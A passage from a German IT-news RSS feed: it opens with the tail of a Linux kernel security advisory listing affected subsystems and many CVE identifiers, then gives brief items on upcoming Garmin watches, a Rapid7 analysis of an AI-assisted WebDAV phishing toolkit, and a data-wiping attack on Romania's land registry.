It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23207, CVE-2026-23226, CVE-2026-23227, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23253, CVE-2026-23255,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23279, CVE-2026-23281, CVE-2026-23284, CVE-2026-23285,
CVE-2026-23286, CVE-2026-23287, CVE-2026-23289, CVE-2026-23290,
CVE-2026-23291, CVE-2026-23292, CVE-2026-23293, CVE-2026-23296,
CVE-2026-23298, CVE-2026-23300, CVE-2026-23302, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23306, CVE-2026-23307, CVE-2026-23308,
CVE-2026-23310, CVE-2026-23312, CVE-2026-23313, CVE-2026-23315,
CVE-2026-23317, CVE-2026-23318, CVE-2026-23319, CVE-2026-23321,
CVE-2026-23324, CVE-2026-23325, CVE-2026-23330, CVE-2026-23334,
CVE-2026-23335, CVE-2026-23336, CVE-2026-23339, CVE-2026-23340,
CVE-2026-23343, CVE-2026-23347, CVE-2026-23352, CVE-2026-23356,
CVE-2026-23357, CVE-2026-23359, CVE-2026-23360, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23412,
CVE-2026-23413, CVE-2026-23414, CVE-2026-23418, CVE-2026-23419,
CVE-2026-23420, CVE-2026-23426, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23452, CVE-2026-23454, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31403, CVE-2026-31405, CVE-2026-31407, CVE-2026-31408,
CVE-2026-31409, CVE-2026-31412, CVE-2026-31413, CVE-2026-31414,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31438, CVE-2026-31439, CVE-2026-31440, CVE-2026-31441,
CVE-2026-31446, CVE-2026-31447, CVE-2026-31449, CVE-2026-31450,
CVE-2026-31451, CVE-2026-31452, CVE-2026-31453, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31458, CVE-2026-31464, CVE-2026-31466,
CVE-2026-31467, CVE-2026-31469, CVE-2026-31470, CVE-2026-31473,
CVE-2026-31474, CVE-2026-31476, CVE-2026-31477, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31506, CVE-2026-31507, CVE-2026-31508,
CVE-2026-31509, CVE-2026-31510, CVE-2026-31511, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31516, CVE-2026-31518, CVE-2026-31519,
CVE-2026-31520, CVE-2026-31521, CVE-2026-31522, CVE-2026-31523,
CVE-2026-31524, CVE-2026-31525, CVE-2026-31527, CVE-2026-31528,
CVE-2026-31530, CVE-2026-31532, CVE-2026-31540, CVE-2026-31542,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31548, CVE-2026-31549,
CVE-2026-31550, CVE-2026-31551, CVE-2026-31552, CVE-2026-31554,
CVE-2026-31555, CVE-2026-31556, CVE-2026-31557, CVE-2026-31563,
CVE-2026-31565, CVE-2026-31566, CVE-2026-31570, CVE-2026-31575,
CVE-2026-31576, CVE-2026-31577, CVE-2026-31578, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31590, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31602,
CVE-2026-31603, CVE-2026-31604, CVE-2026-31605, CVE-2026-31606,
CVE-2026-31610, CVE-2026-31611, CVE-2026-31612, CVE-2026-31613,
CVE-2026-31615, CVE-2026-31616, CVE-2026-31617, CVE-2026-31618,
CVE-2026-31619, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31634, CVE-2026-31638, CVE-2026-31639,
CVE-2026-31642, CVE-2026-31645, CVE-2026-31646, CVE-2026-31648,
CVE-2026-31651, CVE-2026-31655, CVE-2026-31656, CVE-2026-31658,
CVE-2026-31660, CVE-2026-31661, CVE-2026-31662, CVE-2026-31664,
CVE-2026-31665, CVE-2026-31667, CVE-2026-31670, CVE-2026-31671,
CVE-2026-31672, CVE-2026-31673, CVE-2026-31674, CVE-2026-31675,
CVE-2026-31677, CVE-2026-31678, CVE-2026-31679, CVE-2026-31680,
CVE-2026-31681, CVE-2026-31683, CVE-2026-31684, CVE-2026-31686,
CVE-2026-31689, CVE-2026-31694, CVE-2026-31695, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31704, CVE-2026-31705,
CVE-2026-31706, CVE-2026-31707, CVE-2026-31708, CVE-2026-31709,
CVE-2026-31711, CVE-2026-31712, CVE-2026-31714, CVE-2026-31715,
CVE-2026-31716, CVE-2026-31720, CVE-2026-31721, CVE-2026-31722,
CVE-2026-31723, CVE-2026-31724, CVE-2026-31725, CVE-2026-31726,
CVE-2026-31728, CVE-2026-31729, CVE-2026-31730, CVE-2026-31731,
CVE-2026-31737, CVE-2026-31738, CVE-2026-31740, CVE-2026-31741,
CVE-2026-31747, CVE-2026-31748, CVE-2026-31749, CVE-2026-31751,
CVE-2026-31752, CVE-2026-31754, CVE-2026-31755, CVE-2026-31756,
CVE-2026-31758, CVE-2026-31759, CVE-2026-31761, CVE-2026-31762,
CVE-2026-31763, CVE-2026-31767, CVE-2026-31768, CVE-2026-31770,
CVE-2026-31772, CVE-2026-31773, CVE-2026-31778, CVE-2026-31779,
CVE-2026-31780, CVE-2026-31781, CVE-2026-31788, CVE-2026-43007,
CVE-2026-43012, CVE-2026-43013, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43016, CVE-2026-43017, CVE-2026-43018, CVE-2026-43019,
CVE-2026-43020, CVE-2026-43023, CVE-2026-43024, CVE-2026-43025,
CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030,
CVE-2026-43032, CVE-2026-43035, CVE-2026-43036, CVE-2026-43040,
CVE-2026-43041, CVE-2026-43043, CVE-2026-43044, CVE-2026-43046,
CVE-2026-43047, CVE-2026-43049, CVE-2026-43050, CVE-2026-43051,
CVE-2026-43052, CVE-2026-43054, CVE-2026-43056, CVE-2026-43057,
CVE-2026-43058, CVE-2026-43059, CVE-2026-43060, CVE-2026-43061,
CVE-2026-43062, CVE-2026-43064, CVE-2026-43065, CVE-2026-43066,
CVE-2026-43068, CVE-2026-43069, CVE-2026-43072, CVE-2026-43073,
CVE-2026-43074, CVE-2026-43075, CVE-2026-43076, CVE-2026-43079,
CVE-2026-43080, CVE-2026-43081, CVE-2026-43082, CVE-2026-43084,
CVE-2026-43085, CVE-2026-43086, CVE-2026-43088, CVE-2026-43089,
CVE-2026-43091, CVE-2026-43092, CVE-2026-43093, CVE-2026-43094,
CVE-2026-43098, CVE-2026-43099, CVE-2026-43103, CVE-2026-43104,
CVE-2026-43105, CVE-2026-43107, CVE-2026-43109, CVE-2026-43110,
CVE-2026-43111, CVE-2026-43112, CVE-2026-43113, CVE-2026-43119,
CVE-2026-43120, CVE-2026-43129, CVE-2026-43162, CVE-2026-43245,
CVE-2026-43252, CVE-2026-43265, CVE-2026-43281, CVE-2026-43324,
CVE-2026-43327, CVE-2026-43328, CVE-2026-43329, CVE-2026-43330,
CVE-2026-43332, CVE-2026-43333, CVE-2026-43334, CVE-2026-43336,
CVE-2026-43338, CVE-2026-43339, CVE-2026-43340, CVE-2026-43342,
CVE-2026-43343, CVE-2026-43345, CVE-2026-43350, CVE-2026-43355,
CVE-2026-43357, CVE-2026-43359, CVE-2026-43360, CVE-2026-43361,
CVE-2026-43362, CVE-2026-43363, CVE-2026-43365, CVE-2026-43366,
CVE-2026-43368, CVE-2026-43370, CVE-2026-43371, CVE-2026-43372,
CVE-2026-43373, CVE-2026-43377, CVE-2026-43380, CVE-2026-43381,
CVE-2026-43382, CVE-2026-43386, CVE-2026-43387, CVE-2026-43395,
CVE-2026-43397, CVE-2026-43405, CVE-2026-43408, CVE-2026-43409,
CVE-2026-43411, CVE-2026-43412, CVE-2026-43413, CVE-2026-43415,
CVE-2026-43419, CVE-2026-43420, CVE-2026-43421, CVE-2026-43424,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43436,
CVE-2026-43437, CVE-2026-43439, CVE-2026-43441, CVE-2026-43445,
CVE-2026-43448, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43455, CVE-2026-43456,
CVE-2026-43457, CVE-2026-43458, CVE-2026-43459, CVE-2026-43466,
CVE-2026-43467, CVE-2026-43468, CVE-2026-43469, CVE-2026-43471,
CVE-2026-43472, CVE-2026-43473, CVE-2026-43475, CVE-2026-43476,
CVE-2026-43480, CVE-2026-43483, CVE-2026-43484, CVE-2026-43488,
CVE-2026-43490, CVE-2026-43491, CVE-2026-43492, CVE-2026-43495,
CVE-2026-43496, CVE-2026-43497, CVE-2026-43499, CVE-2026-43502,
CVE-2026-45834, CVE-2026-45835, CVE-2026-45836, CVE-2026-45838,
CVE-2026-45839, CVE-2026-45840, CVE-2026-45841, CVE-2026-45842,
CVE-2026-45843, CVE-2026-45844, CVE-2026-45845, CVE-2026-45846,
CVE-2026-45855, CVE-2026-45858, CVE-2026-45899, CVE-2026-45911,
CVE-2026-45920, CVE-2026-45924, CVE-2026-45942, CVE-2026-45943,
CVE-2026-45956, CVE-2026-45958, CVE-2026-45985, CVE-2026-45986,
CVE-2026-45987, CVE-2026-45989, CVE-2026-45991, CVE-2026-45994,
CVE-2026-45996, CVE-2026-45997, CVE-2026-45999, CVE-2026-46002,
CVE-2026-46003, CVE-2026-46004, CVE-2026-46005, CVE-2026-46006,
CVE-2026-46007, CVE-2026-46009, CVE-2026-46011, CVE-2026-46012,
CVE-2026-46015, CVE-2026-46016, CVE-2026-46018, CVE-2026-46019,
CVE-2026-46021, CVE-2026-46022, CVE-2026-46023, CVE-2026-46024,
CVE-2026-46026, CVE-2026-46027, CVE-2026-46031, CVE-2026-46033,
CVE-2026-46037, CVE-2026-46038, CVE-2026-46040, CVE-2026-46041,
CVE-2026-46044, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46056, CVE-2026-46058, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46068,
CVE-2026-46069, CVE-2026-46070, CVE-2026-46072, CVE-2026-46073,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46082, CVE-2026-46083,
CVE-2026-46084, CVE-2026-46086, CVE-2026-46088, CVE-2026-46089,
CVE-2026-46090, CVE-2026-46091, CVE-2026-46092, CVE-2026-46094,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46106, CVE-2026-46107, CVE-2026-46108,
CVE-2026-46110, CVE-2026-46111, CVE-2026-46112, CVE-2026-46113,
CVE-2026-46114, CVE-2026-46116, CVE-2026-46117, CVE-2026-46120,
CVE-2026-46121, CVE-2026-46122, CVE-2026-46123, CVE-2026-46124,
CVE-2026-46125, CVE-2026-46126, CVE-2026-46127, CVE-2026-46128,
CVE-2026-46129, CVE-2026-46131, CVE-2026-46132, CVE-2026-46133,
CVE-2026-46136, CVE-2026-46137, CVE-2026-46138, CVE-2026-46139,
CVE-2026-46142, CVE-2026-46143, CVE-2026-46144, CVE-2026-46145,
CVE-2026-46146, CVE-2026-46149, CVE-2026-46150, CVE-2026-46151,
CVE-2026-46152, CVE-2026-46157, CVE-2026-46159, CVE-2026-46160,
CVE-2026-46161, CVE-2026-46163, CVE-2026-46164, CVE-2026-46167,
CVE-2026-46168, CVE-2026-46169, CVE-2026-46172, CVE-2026-46173,
CVE-2026-46174, CVE-2026-46176, CVE-2026-46177, CVE-2026-46178,
CVE-2026-46179, CVE-2026-46180, CVE-2026-46184, CVE-2026-46186,
CVE-2026-46187, CVE-2026-46189, CVE-2026-46190, CVE-2026-46191,
CVE-2026-46193, CVE-2026-46194, CVE-2026-46196, CVE-2026-46197,
CVE-2026-46198, CVE-2026-46199, CVE-2026-46200, CVE-2026-46201,
CVE-2026-46204, CVE-2026-46205, CVE-2026-46206, CVE-2026-46207,
CVE-2026-46208, CVE-2026-46209, CVE-2026-46211, CVE-2026-46212,
CVE-2026-46214, CVE-2026-46218, CVE-2026-46219, CVE-2026-46220,
CVE-2026-46225, CVE-2026-46226, CVE-2026-46227, CVE-2026-46229,
CVE-2026-46230, CVE-2026-46231, CVE-2026-46232, CVE-2026-46233,
CVE-2026-46234, CVE-2026-46235, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46241, CVE-2026-46273, CVE-2026-46274, CVE-2026-46280,
CVE-2026-46282, CVE-2026-46285, CVE-2026-46286, CVE-2026-46287,
CVE-2026-46291, CVE-2026-46292, CVE-2026-46293, CVE-2026-46294,
CVE-2026-46296, CVE-2026-46299, CVE-2026-46301, CVE-2026-46303,
CVE-2026-46304, CVE-2026-46306, CVE-2026-46307, CVE-2026-46312,
CVE-2026-46314, CVE-2026-46319, CVE-2026-52911, CVE-2026-52920,
CVE-2026-52925, CVE-2026-52933, CVE-2026-52936, CVE-2026-52951,
CVE-2026-52954, CVE-2026-52955, CVE-2026-52957, CVE-2026-52958,
CVE-2026-52961, CVE-2026-52962, CVE-2026-52963, CVE-2026-52964,
CVE-2026-52967, CVE-2026-52968, CVE-2026-52969, CVE-2026-52970,
CVE-2026-52974, CVE-2026-52975, CVE-2026-52977, CVE-2026-52981,
CVE-2026-52982, CVE-2026-52984, CVE-2026-52985, CVE-2026-52986,
CVE-2026-52989, CVE-2026-52990, CVE-2026-52992, CVE-2026-52993,
CVE-2026-52995, CVE-2026-52998, CVE-2026-52999, CVE-2026-53001,
CVE-2026-53002, CVE-2026-53003, CVE-2026-53004, CVE-2026-53006,
CVE-2026-53011, CVE-2026-53012, CVE-2026-53013, CVE-2026-53014,
CVE-2026-53015, CVE-2026-53016, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53032, CVE-2026-53033, CVE-2026-53034,
CVE-2026-53035, CVE-2026-53036, CVE-2026-53037, CVE-2026-53039,
CVE-2026-53040, CVE-2026-53041, CVE-2026-53043, CVE-2026-53045,
CVE-2026-53046, CVE-2026-53047, CVE-2026-53048, CVE-2026-53049,
CVE-2026-53050, CVE-2026-53052, CVE-2026-53056, CVE-2026-53058,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53063, CVE-2026-53064, CVE-2026-53065, CVE-2026-53066,
CVE-2026-53068, CVE-2026-53069, CVE-2026-53071, CVE-2026-53072,
CVE-2026-53073, CVE-2026-53074, CVE-2026-53075, CVE-2026-53076,
CVE-2026-53077, CVE-2026-53082, CVE-2026-53083, CVE-2026-53084,
CVE-2026-53085, CVE-2026-53086, CVE-2026-53088, CVE-2026-53093,
CVE-2026-53094, CVE-2026-53096, CVE-2026-53097, CVE-2026-53098,
CVE-2026-53110, CVE-2026-53111, CVE-2026-53112, CVE-2026-53115,
CVE-2026-53117, CVE-2026-53122, CVE-2026-53123, CVE-2026-53126,
CVE-2026-53128, CVE-2026-53130, CVE-2026-53279, CVE-2026-53287,
CVE-2026-53289, CVE-2026-53291, CVE-2026-53293, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53303, CVE-2026-53304,
CVE-2026-53306, CVE-2026-53309, CVE-2026-53314, CVE-2026-53320,
CVE-2026-53369, CVE-2026-53374, CVE-2026-53375, CVE-2026-53376,
CVE-2026-53379, CVE-2026-63838, CVE-2026-63843, CVE-2026-63844,
CVE-2026-63845, CVE-2026-63846, CVE-2026-63847, CVE-2026-63848,
CVE-2026-63851, CVE-2026-63852, CVE-2026-63854, CVE-2026-63855,
CVE-2026-63856, CVE-2026-63860, CVE-2026-63861, CVE-2026-63862,
CVE-2026-63865, CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[Garmin Fenix 9 und Fenix 9 Pro: Hinweise auf baldigen Launch]]></title>
<description><![CDATA[Garmin steht offenbar kurz vor dem Launch von zwei neuen Fitnesstrackern: den Fenix 9 und Fenix 9 Pro. Beide Modelle sollen offenbar parallel vorgestellt werden. Das Pro-Modell soll es neben der großen 47-mm-Ausführung auch als 43-mm-Variante geben und auch das...Zum Beitrag: Garmin Fenix 9 und F...]]></description>
<link>https://tsecurity.de/de/3683065/it-nachrichten/garmin-fenix-9-und-fenix-9-pro-hinweise-auf-baldigen-launch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683065/it-nachrichten/garmin-fenix-9-und-fenix-9-pro-hinweise-auf-baldigen-launch/</guid>
<pubDate>Tue, 21 Jul 2026 10:48:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Garmin steht offenbar kurz vor dem Launch von zwei neuen Fitnesstrackern: den Fenix 9 und Fenix 9 Pro. Beide Modelle sollen offenbar parallel vorgestellt werden. Das Pro-Modell soll es neben der großen 47-mm-Ausführung auch als 43-mm-Variante geben und auch das...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/garmin-fenix-9-und-fenix-9-pro-hinweise-auf-baldigen-launch/">Garmin Fenix 9 und Fenix 9 Pro: Hinweise auf baldigen Launch</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Offener Server enttarnt WebDAV-Phishing: KI-gestütztes Toolkit mit 59 Testfällen]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – In einer aktuellen Sicherheitsanalyse wurde ein offen zugänglicher Delivery-Server entdeckt, auf dem ein komplettes KI-gestütztes Phishing-Toolkit mitsamt Testnotizen lag. Rapid7 beschreibt, wie der Betreiber die Kampagne nicht nur ausrollte, sondern sie im selben Repositor...]]></description>
<link>https://tsecurity.de/de/3682860/it-security-nachrichten/offener-server-enttarnt-webdav-phishing-ki-gestuetztes-toolkit-mit-59-testfaellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682860/it-security-nachrichten/offener-server-enttarnt-webdav-phishing-ki-gestuetztes-toolkit-mit-59-testfaellen/</guid>
<pubDate>Tue, 21 Jul 2026 08:53:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit-59-tests.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit-59-tests.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit-59-tests-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit-59-tests-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit-59-tests-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit-59-tests-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit-59-tests-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – In einer aktuellen Sicherheitsanalyse wurde ein offen zugänglicher Delivery-Server entdeckt, auf dem ein komplettes KI-gestütztes Phishing-Toolkit mitsamt Testnotizen lag. Rapid7 beschreibt, wie der Betreiber die Kampagne nicht nur ausrollte, sondern sie im selben Repository parallel weiterentwickelte – inklusive fehlgeschlagener Experimente und detaillierter Abdeckungslogik. Besonders brisant: Ein WebDAV-Working-Directory-Hijack startet signierte Windows-Binaries ohne […]</p>
<div><a href="https://www.it-boltwise.de/offener-server-enttarnt-webdav-phishing-ki-gestuetztes-toolkit-mit-59-testfaellen.html">... den vollständigen Artikel <strong>»Offener Server enttarnt WebDAV-Phishing: KI-gestütztes Toolkit mit 59 Testfällen«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/offener-server-enttarnt-webdav-phishing-ki-gestuetztes-toolkit-mit-59-testfaellen.html">Offener Server enttarnt WebDAV-Phishing: KI-gestütztes Toolkit mit 59 Testfällen</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ByteToBreach löscht rumänisches Grundbuch – Immobilienhandel steht still]]></title>
<description><![CDATA[BUKAREST / LONDON (IT BOLTWISE) – Ein Angriff der Gruppe ByteToBreach hat in Rumänien die gesamte Grundbuchdatenbank gelöscht und damit den Immobilienhandel weitgehend lahmgelegt. Notare können seit dem Vorfall keine neuen Transaktionen mehr veranlassen, weil Eigentumsnachweise und Details aus de...]]></description>
<link>https://tsecurity.de/de/3682470/it-security-nachrichten/bytetobreach-loescht-rumaenisches-grundbuch-immobilienhandel-steht-still/</link>
